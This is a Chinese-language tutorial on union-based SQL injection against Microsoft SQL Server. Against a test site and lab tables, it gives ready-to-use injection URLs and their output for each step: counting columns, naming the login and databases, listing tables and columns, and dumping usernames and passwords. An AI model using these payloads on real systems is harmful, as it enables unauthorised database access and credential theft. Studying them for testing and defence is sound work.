0x00 概要
在页面有显示位的情况下使用
0x01 测试数据
1> select * from article;
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)
# 测试表数据: users;
sql server> select * from users;
+----+--------------+----------+
| id | username | password |
+----+--------------+----------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
+----+--------------+----------+
2 rows in set (0.00 sec)
sql server> SELECT system_user;
+-----------------------+
| field1 |
+-----------------------+
| sa |
+-----------------------+
1 row in set (0.00 sec)
sql server> select db_name();
+-----------------------+
| field1 |
+-----------------------+
| test |
+-----------------------+
1 row in set (0.00 sec)
0x02 查看列数
web语句: http://www.test.com/sql.php?id=1 order by 3
数据库语句: select * from users where id=1 order by 3
# 正确的时候 会返回原来的数据
+-----+--------------+------------+
| id | username | password |
+--------+------------+-----------+
| 1 | test-user-01 | 123456 |
+-----+--------------+------------+
(1 rows affected)
# 错误的时候
sql server> select * from users where id=1 order by 4;
42000 - [SQL Server]ORDER BY 位置号 4 超出了选择列表中项数的范围。
0x03 爆当前连接用户
web语句: http://www.test.com/sql.php?id=-1 union select system_user,null,null
数据库语句: select * from users where id=-1 union select system_user,null,null
1> select * from users where id=-1 union select system_user,null,null;
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
| sa | null | null |
+----+----------+-----------+
(1 rows affected)
0x04 爆当前连接的数据库
web语句: http://www.test.com/sql.php?id=-1 union select null,db_name(),null
数据库语句: select * from users where id=-1 union select null,db_name(),null
1> select * from users where id=-1 union select null,db_name(),null;
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
|null| test | null |
+----+----------+-----------+
(1 rows affected)
0x05 爆库名方法一
注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库
web语句: http://www.test.com/sql.php?id=-1 union select null,db_name(1),null
数据库语句: select * from users where id=-1 union select null,db_name(1),null
# 获取 1库
1> select * from users where id=-1 union select null,db_name(1),null;
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | master | NULL |
+------+----------+-----------+
(1 rows affected)
# 获取 2库
1> select * from users where id=-1 union select null,db_name(2),null;
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | tempdb | NULL |
+------+----------+-----------+
(1 rows affected)
0x06 爆库名方法二
优点:简单
缺点:要是查询的 dbid 刚好不存在,那么就会查询不出数据
查询不同的库可以这样
例如:
修改 dbid>=1
修改 dbid>=2
web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,name,null from master.dbo.sysdatabases where dbid>=1
数据库语句: select * from users where id=-1 union select top 1 null,name,null from master.dbo.sysdatabases where dbid>=1
# 获取 1库
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
TOP 1 NULL,
name,
NULL
FROM
master.dbo.sysdatabases
WHERE
dbid >= 1;
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | master | NULL |
+------+----------+-----------+
(1 rows affected)
# 获取 2库
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
TOP 1 NULL,
name,
NULL
FROM
master.dbo.sysdatabases
WHERE
dbid >= 2;
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | tempdb | NULL |
+------+----------+-----------+
(1 rows affected)
0x06 爆库名方法三
优点:可以保证每个 row_number 都是查询的到的
注意:
OVER(Order by dbid) 里面的 dbid 要修改为 master.dbo.sysdatabases 表里面存在的一个字段
查询不同的库可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,a.name,null from (select ROW_NUMBER() OVER(Order by dbid) AS row_number,name from master.dbo.sysdatabases) as a where row_number=1
数据库语句: select * from users where id=-1 union select top 1 null,a.name,null from (select ROW_NUMBER() OVER(Order by dbid) AS row_number,name from master.dbo.sysdatabases) as a where row_number=1
# 获取 1库
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
TOP 1 NULL,
a.name,
NULL
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY dbid) AS row_number,
name
FROM
master.dbo.sysdatabases
) AS a
WHERE
row_number = 1;
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | master | NULL |
+------+----------+-----------+
(1 rows affected)
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
TOP 1 NULL,
a.name,
NULL
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY dbid) AS row_number,
name
FROM
master.dbo.sysdatabases
) AS a
WHERE
row_number = 2;
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | tempdb | NULL |
+------+----------+-----------+
(1 rows affected)
0x07 爆表名
注意:
OVER(Order by table_name) 里面的 table_name 要修改为 information_schema.tables 表里面存在的一个字段
查询不同的库可以这样
例如:
table_catalog=db_name() (查询当前库)
table_catalog=’要查询的库名’
查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,a.table_name,null from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1
数据库语句: select * from users where id=-1 union select top 1 null,a.table_name,null from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1
# 爆 1表
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
TOP 1 NULL,
a.table_name,
NULL
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
table_name
FROM
information_schema.tables
WHERE
table_catalog = db_name()
) AS a
WHERE
row_number = 1;
2> go
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | article | NULL |
+------+----------+-----------+
(1 rows affected)
# 爆 2表
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
TOP 1 NULL,
a.table_name,
NULL
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
table_name
FROM
information_schema.tables
WHERE
table_catalog = db_name()
) AS a
WHERE
row_number = 2;
2> go
+------+----------+-----------+
| id | username | password |
+------+----------+-----------+
| NULL | users | NULL |
+------+----------+-----------+
(1 rows affected)
0x08 暴字段
注意:
OVER(Order by column_name) 里面的 column_name 要修改为 information_schema.columns 表里面存在的一个字段
查询不同的表可以这样
例如:
table_name=’要查询的表名’
查询不同的字段可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,a.column_name,null from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1
数据库语句: select top 1 null,a.column_name,null from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1
# 获取当前库 users表 第一个字段名称
1>
SELECT
TOP 1 NULL,
a.column_name,
NULL
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
column_name
FROM
information_schema.columns
WHERE
table_catalog = db_name()
AND table_name = 'users'
) AS a
WHERE
row_number = 1;
2> go
+------+-------------+------+
| | column_name | |
+------+-------------+------+
| NULL | id | NULL |
+------+-------------+------+
(1 rows affected)
# 获取当前库 users表 第二个字段名称
1>
SELECT
TOP 1 NULL,
a.column_name,
NULL
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
column_name
FROM
information_schema.columns
WHERE
table_catalog = db_name()
AND table_name = 'users'
) AS a
WHERE
row_number = 2;
2> go
+------+-------------+------+
| | column_name | |
+------+-------------+------+
| NULL | password | NULL |
+------+-------------+------+
(1 rows affected)
0x09 爆内容
注意:
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段
查询不同的数据可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=-1 union select a.id,a.username,a.password from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1
数据库语句: select from users where id=-1 union select a.id,a.username,a.password from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number, from users) as a where row_number=1
# 查询users表 第一条数据
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
a.id,
a.username,
a.password
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
FROM
users
) AS a
WHERE
row_number = 1;
2> go
+--------+------------+-----------+
| id | username | password |
+--------+------------+-----------+
| 1 | test-user-01 | 123456 |
+--------+------------+-----------+
(1 rows affected)
# 查询users表 第二条数据
1> SELECT
*
FROM
users
WHERE
id =- 1
UNION
SELECT
a.id,
a.username,
a.password
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
FROM
users
) AS a
WHERE
row_number = 2;
2> go
+--------+------------+-----------+
| id | username | password |
+--------+------------+-----------+
| 2 | test-user-02 | 234567 |
+--------+------------+-----------+
(1 rows affected)